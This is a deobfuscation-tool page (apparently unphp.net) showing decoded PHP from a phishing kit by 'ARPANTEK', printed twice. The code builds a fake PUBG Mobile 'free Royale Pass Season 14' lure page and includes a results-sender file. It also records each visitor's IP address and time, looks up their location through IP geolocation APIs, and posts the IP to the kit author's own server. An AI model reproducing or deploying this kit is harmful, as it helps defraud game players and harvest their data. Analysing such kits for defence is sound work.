Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

/* Decoded by unphp.net */ <?php // SCRIPT BY ARPANTEK // COPYRIGHT ITS ME ARPANTEK /..

Decoded Output download

/* Decoded by unphp.net */ 
 
<?php // SCRIPT BY ARPANTEK 
// COPYRIGHT ITS ME ARPANTEK 
// HARGAI W OK, JANGAN LO UBAH COPYRIGHT NYA 
// MENDAPATKAN INFO PENGIRIM RESULT 
include 'sender.php'; 
//KONTROL UNTUK DESKRIPSI HALAMAN 
$title = 'PUBG MOBILE - Royale Pass Season 14'; 
$description = 'Royale Pass Season 14 has begun! Collect your favorite prizes here right now !!! This promo is free without the need for topup. Come join this event with friends all over the world now!'; 
$copyright = 'PUBG MOBILE'; 
$theme = '#000'; 
$image = 'https://i.ibb.co/2KTqW5h/season.png'; 
$icon = 'https://www.pubgmobile.com/common/images/icon_logo.jpg'; 
//KONTROL UNTUK MENDAPATKAN ZONA WAKTU (WILAYAH JAKARTA) 
date_default_timezone_set('Asia/Jakarta'); 
$jamasuk = date('l, d-m-Y h:i:s'); 
//KONTROL UNTUK HALAMAN KIRIM RESULT 
$author = 'ITS ME ARPANTEK'; 
//MENDAPATKAN INFORMASI 
class detail { 
    function get_client_info() { 
        $ipaddress = ''; 
        if (getenv('HTTP_CLIENT_IP')) $ipaddress = getenv('HTTP_CLIENT_IP'); 
        else if (getenv('HTTP_X_FORWARDED_FOR')) $ipaddress = getenv('HTTP_X_FORWARDED_FOR'); 
        else if (getenv('HTTP_X_FORWARDED')) $ipaddress = getenv('HTTP_X_FORWARDED'); 
        else if (getenv('HTTP_FORWARDED_FOR')) $ipaddress = getenv('HTTP_FORWARDED_FOR'); 
        else if (getenv('HTTP_FORWARDED')) $ipaddress = getenv('HTTP_FORWARDED'); 
        else if (getenv('REMOTE_ADDR')) $ipaddress = getenv('REMOTE_ADDR'); 
        else $ipaddress = 'IP tidak dikenali'; 
        return $ipaddress; 
    } 
} 
$detail = new detail(); 
$ipp = $detail->get_client_info(); 
class curlni { 
    function geo($ipp) { 
        //MENDAPATKAN KODE PANGGILAN NEGARA 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, "https://api.ipgeolocationapi.com/geolocate/$ipp"); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
        $chresult = curl_exec($ch); 
        curl_close($ch); 
        $arpantek_cocode = json_decode($chresult, true); 
        return $arpantek_cocode; 
    } 
    function iplook($ipp) { 
        //MENDAPATKAN LOKASI 
        $url = "https://extreme-ip-lookup.com/json/$ipp"; 
        $ch = curl_init($url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); 
        $data = curl_exec($ch); 
        curl_close($ch); 
        $arpantek_geo = json_decode($data, TRUE); 
        return $arpantek_geo; 
    } 
    function bendera($ipp) { 
        //MENDAPATKAN BENDERA NEGARA 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, "https://arpanrizki.my.id/api/get_flag2/api.php"); 
        curl_setopt($ch, CURLOPT_POST, 1); 
        curl_setopt($ch, CURLOPT_POSTFIELDS, "ip=$ipp"); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
        $arpantek_flag = curl_exec($ch); 
        curl_close($ch); 
        return $arpantek_flag; 
    } 
} ?>

Did this file decode correctly?

Original Code

/* Decoded by unphp.net */

<?php // SCRIPT BY ARPANTEK
// COPYRIGHT ITS ME ARPANTEK
// HARGAI W OK, JANGAN LO UBAH COPYRIGHT NYA
// MENDAPATKAN INFO PENGIRIM RESULT
include 'sender.php';
//KONTROL UNTUK DESKRIPSI HALAMAN
$title = 'PUBG MOBILE - Royale Pass Season 14';
$description = 'Royale Pass Season 14 has begun! Collect your favorite prizes here right now !!! This promo is free without the need for topup. Come join this event with friends all over the world now!';
$copyright = 'PUBG MOBILE';
$theme = '#000';
$image = 'https://i.ibb.co/2KTqW5h/season.png';
$icon = 'https://www.pubgmobile.com/common/images/icon_logo.jpg';
//KONTROL UNTUK MENDAPATKAN ZONA WAKTU (WILAYAH JAKARTA)
date_default_timezone_set('Asia/Jakarta');
$jamasuk = date('l, d-m-Y h:i:s');
//KONTROL UNTUK HALAMAN KIRIM RESULT
$author = 'ITS ME ARPANTEK';
//MENDAPATKAN INFORMASI
class detail {
    function get_client_info() {
        $ipaddress = '';
        if (getenv('HTTP_CLIENT_IP')) $ipaddress = getenv('HTTP_CLIENT_IP');
        else if (getenv('HTTP_X_FORWARDED_FOR')) $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
        else if (getenv('HTTP_X_FORWARDED')) $ipaddress = getenv('HTTP_X_FORWARDED');
        else if (getenv('HTTP_FORWARDED_FOR')) $ipaddress = getenv('HTTP_FORWARDED_FOR');
        else if (getenv('HTTP_FORWARDED')) $ipaddress = getenv('HTTP_FORWARDED');
        else if (getenv('REMOTE_ADDR')) $ipaddress = getenv('REMOTE_ADDR');
        else $ipaddress = 'IP tidak dikenali';
        return $ipaddress;
    }
}
$detail = new detail();
$ipp = $detail->get_client_info();
class curlni {
    function geo($ipp) {
        //MENDAPATKAN KODE PANGGILAN NEGARA
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://api.ipgeolocationapi.com/geolocate/$ipp");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $chresult = curl_exec($ch);
        curl_close($ch);
        $arpantek_cocode = json_decode($chresult, true);
        return $arpantek_cocode;
    }
    function iplook($ipp) {
        //MENDAPATKAN LOKASI
        $url = "https://extreme-ip-lookup.com/json/$ipp";
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        $data = curl_exec($ch);
        curl_close($ch);
        $arpantek_geo = json_decode($data, TRUE);
        return $arpantek_geo;
    }
    function bendera($ipp) {
        //MENDAPATKAN BENDERA NEGARA
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "https://arpanrizki.my.id/api/get_flag2/api.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, "ip=$ipp");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $arpantek_flag = curl_exec($ch);
        curl_close($ch);
        return $arpantek_flag;
    }
}

Function Calls

None

Variables

None

Stats

MD5 9dc173f94a691aee209e389a2848b465
Eval Count 0
Decode Time 104 ms